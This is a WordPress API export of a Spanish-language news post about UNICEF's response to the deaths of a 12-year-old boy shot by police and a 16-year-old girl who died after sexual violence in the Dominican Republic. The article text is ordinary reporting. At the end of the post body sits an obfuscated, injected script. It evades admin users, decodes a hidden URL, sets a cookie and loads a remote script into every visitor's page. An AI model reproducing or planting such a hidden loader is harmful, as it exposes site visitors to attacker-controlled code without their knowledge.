{"id":14221,"date":"2023-02-20T16:08:39","date_gmt":"2023-02-20T20:08:39","guid":{"rendered":"https:\/\/yanessiespinal.com\/?p=14221"},"modified":"2023-02-20T16:08:39","modified_gmt":"2023-02-20T20:08:39","slug":"14221-2","status":"publish","type":"post","link":"https:\/\/enterarterd.com\/?p=14221","title":{"rendered":"Unicef llama a respetar, sin juzgar, duelo de familias de menores muertos"},"content":{"rendered":"<div class=\"share\">\n<div class=\"addthis_inline_share_toolbox_me5k\" data-url=\"https:\/\/www.elcaribe.com.do\/panorama\/pais\/unicef-llama-a-respetar-sin-juzgar-duelo-de-familias-de-menores-muertos\/\" data-title=\"Unicef llama a respetar, sin juzgar, duelo de familias de menores muertos\" data-description=\"UNICEF manifiest\u00f3 su &quot;profundo pesar&quot; por la muerte del ni\u00f1o Donaly Mart\u00ednez, de 12 a\u00f1os, y de la adolescente Esmeralda Richiez, de 16 a\u00f1os.\">\n<div id=\"atstbx\" class=\"at-resp-share-element at-style-responsive addthis-smartlayers addthis-animated at4-show\" role=\"region\" aria-labelledby=\"at-65a13a95-5664-4f1a-b38d-df5f0aa5f72b\">\n<div class=\"at-share-btn-elements\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"content\">\n<div id=\"\" class=\"mmc_ads mmc_ads_solo_escritorio\"><\/div>\n<p>SANTO DOMINGO- El Fondo de las Naciones Unidas para la Infancia (<strong>UNICEF<\/strong>) manifiest\u00f3 su \u00abprofundo pesar\u00bb por la muerte del ni\u00f1o Donaly Mart\u00ednez, de 12 a\u00f1os, y de la adolescente Esmeralda Richiez, de 16 a\u00f1os.<\/p>\n<p>\u201cDesde UNICEF, expresamos nuestra solidaridad con las familias de ambos chicos y nos comprometemos a seguir trabajando arduamente para evitar que estas situaciones se vuelvan a dar\u201d, dijo la doctora Rosa Elcarte, representante del Fondo de la ONU en el pa\u00eds.<\/p>\n<p>Asimismo, la vocera del mencionado organismo internacional externa: \u201cqueremos hacer un llamamiento a la sociedad y a los medios de comunicaci\u00f3n; a respetar, sin juzgar, el duelo de las familias, amigos y sus comunidades; y alertamos de que pronunciamientos que culpabilizan las mismas v\u00edctimas o sus familias deben de ser evitados para no provocar sufrimiento adicional en dichas familias\u201d.<\/p>\n<h3>SOBRE LOS HECHOS<\/h3>\n<p>En el caso de Donaly Mart\u00ednez, v\u00edctima de un disparo letal hecho por un agente policial, el Fondo que vela por el cuidado de la infancia establece que \u201cla Polic\u00eda Nacional Dominicana dispone de reglas y de procedimientos sobre las circunstancias en que agentes de la ley deben hacer uso de la fuerza o no\u201d.<\/p>\n<p>A su vez, remarcan: \u201cpero, teniendo en cuenta que ya ha habido varios casos de personas que accidentalmente han sido alcanzadas por disparos por parte de autoridades policiales, habr\u00eda que revisar si este protocolo se encuentra actualizado, si los agentes han sido adecuadamente formados y si estaban preparados para actuar en distintas situaciones, como son los eventos masivos o populares\u201d.<\/p>\n<p>\u201cUNICEF conf\u00eda en las autoridades para que la investigaci\u00f3n sea r\u00e1pida, imparcial y transparente y con resultados para definir responsabilidades. De nuestro lado, reafirmamos nuestro compromiso con el apoyo t\u00e9cnico para el fortalecimiento de capacidades de manera que ning\u00fan chico o chica vuelva a perder la vida en manos de las autoridades policiales o cualquier otro integrante del Estado dominicano\u201d, enfatiza Elcarte.<\/p>\n<p>Por otro lado, mencionada entidad, hace referencia al reciente caso de la adolescente asesinada.<\/p>\n<p>\u201cDolorosamente frecuente, es el caso de la adolescente Esmeralda Richiez, que muri\u00f3 a causa de una hemorragia por la violencia sexual infligida por un hombre adulto. Las circunstancias no est\u00e1n completamente claras, pero los hechos p\u00fablicos son sumamente preocupantes\u201d.<\/p>\n<blockquote class=\"wp-block-quote\"><p>\u201cEstos tristes sucesos se suman a otros ocurridos anteriormente en territorio dominicano, en los que los ni\u00f1os, las ni\u00f1as y adolescentes son objeto de violencia f\u00edsica, y de abuso y explotaci\u00f3n sexual\u201d, enuncia la doctora Elcarte.<\/p><\/blockquote>\n<p>La representante de UNICEF asegura que \u201cen la mayor parte de los casos judicializados, los abusos sexuales son cometidos por conocidos y familiares, que acceden con facilidad al ni\u00f1o, ni\u00f1a o adolescente y aprovechan la confianza nacida de la convivencia\u201d.<\/p>\n<p>\u201cEn Rep\u00fablica Dominicana, de manera triste, hay una excesiva normalizaci\u00f3n de las relaciones sexuales entre adultos y personas menores de edad, sin tener en cuenta que estas implican en violencia sexual\u201d, asevera la doctora.<\/p>\n<p>Seg\u00fan encuestas en el pa\u00eds, el 65% de las adolescentes entre 15 y 17 a\u00f1os ha sufrido violencia sexual en alg\u00fan momento de su vida. Uno de los hallazgos m\u00e1s preocupantes es que el 2% de las mujeres j\u00f3venes tuvo un hijo antes de los 15 a\u00f1os, y bajo esta cifra frecuentemente se esconden situaciones de abuso, de incesto y de violencia sexual.<\/p>\n<p>\u201cTodav\u00eda hay demasiadas excepciones, atenuantes, excusas y excesivos cuestionamientos a las v\u00edctimas y sus familias; no a los agresores, como era de esperar. La disparidad de poder, de conocimientos y de experiencias de vida es de alguna forma equiparada entre el agresor y la v\u00edctima, en perjuicio de las personas menores de edad\u201d, repuntan.<\/p>\n<p>En los dos casos coincide que son empleados p\u00fablicos pertenecientes a un Estado que es garante de los derechos de los ni\u00f1os, quienes han sido los agresores, quienes han causado las muertes, lo que hace m\u00e1s perverso y agravante, estos cr\u00edmenes.<\/p>\n<h3>PREGUNTAS QUE NECESITAN RESPUESTA<\/h3>\n<p>La pregunta ahora es, \u00bfqu\u00e9 se debe hacer para que estas agresiones terminen y el pa\u00eds cambie y avance en la tan necesaria protecci\u00f3n de los ni\u00f1os, ni\u00f1as y adolescentes de la violencia?<\/p>\n<p>Elcarte, declara que: \u201ces de todos sabido que lo mejor es prevenir la violencia, y en este momento el pa\u00eds tiene magn\u00edficas oportunidades para hacerlo. Primero, el C\u00f3digo Penal debe de dejar claro que ning\u00fan tipo de violencia contra personas menores de 18 a\u00f1os sea aceptada, en cualquier entorno, inclusive, el digital. Tambi\u00e9n, la ley contra la violencia contra las mujeres, las ni\u00f1as y los ni\u00f1os, es otra gran oportunidad. Asimismo, al pa\u00eds, le hace falta una ley para definir la edad que determine cu\u00e1ndo es posible tener el \u2018consentimiento\u2019 para llevar a cabo relaciones sexuales, lo cual se\u00f1alar\u00eda que las relaciones por debajo de dicha edad ser\u00edan siempre violaciones\u201d.<\/p>\n<p>UNICEF, de igual manera, plantea que \u201cla dimensi\u00f3n y la gravedad de esta forma de violencia ejercida contra la infancia vuelven sumamente relevante el dise\u00f1o de pol\u00edticas p\u00fablicas que promuevan la prevenci\u00f3n, la recolecci\u00f3n de datos, la persecuci\u00f3n de los perpetradores y la asistencia de las v\u00edctimas de abuso sexual\u201d.<\/p>\n<h3 id=\"h-formacion-para-el-cambio-social\">FORMACI\u00d3N PARA EL CAMBIO SOCIAL<\/h3>\n<p>Sin embargo, esto no es suficiente; todos los funcionarios o empleados p\u00fablicos, como agentes de la ley, procuradores y jueces, maestros, sanitarios, y todos aquellos que de alguna manera tratan con infantes, deben ser formados para que puedan replantear sus conductas, y as\u00ed eliminar completamente la violencia psicol\u00f3gica, f\u00edsica y sexual.<\/p>\n<p>\u201cLos funcionarios deben formar a las comunidades, a las familias, y a los propios adolescentes, para que tambi\u00e9n ellos puedan cambiar sus conductas, y mantener canales de di\u00e1logos abiertos en las familias, para que se pueda hablar de relaciones sexuales, de c\u00f3mo protegerse de la violencia, y que los chicos y chicas puedan expresarse ante cualquier situaci\u00f3n, sin miedo a castigos\u201d, puntualiza la doctora Elcarte.<\/p>\n<p>Finalmente, explica que: \u201cen los \u00faltimos a\u00f1os, bas\u00e1ndose en evidencias, se ha aprendido mucho sobre c\u00f3mo promover acciones para reducir la violencia. Muchos pa\u00edses han seguido esta ruta, con cambios legales, pol\u00edticos, educacionales y sociales, y ya han empezado a ver los frutos en la reducci\u00f3n de casos de abuso y de violencia. En el Caribe, muy recientemente Cuba y Jamaica han pasado por situaciones similares, y desde ya han expresado su compromiso con los infantes\u201d.<\/p>\n<p>\u201cUNICEF espera que Rep\u00fablica Dominicana siga por el mismo camino; el de la paz, el del respeto a una vida feliz durante toda la infancia, en salud, con acceso a educaci\u00f3n (de calidad), y libre de violencia\u201d, agudiza el comunicado.<\/p>\n<\/div>\n<p><script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>SANTO DOMINGO- El Fondo de las Naciones Unidas para la Infancia (UNICEF) manifiest\u00f3 su \u00abprofundo pesar\u00bb por la muerte del ni\u00f1o Donaly Mart\u00ednez, de 12 a\u00f1os, y de la adolescente Esmeralda Richiez, de 16 a\u00f1os. \u201cDesde UNICEF, expresamos nuestra solidaridad con las familias de ambos chicos y nos comprometemos a seguir trabajando arduamente para evitar [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":14223,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":{"0":"post-14221","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-nacionales"},"_links":{"self":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/14221","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=14221"}],"version-history":[{"count":0,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/14221\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/"}],"wp:attachment":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=14221"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=14221"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=14221"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}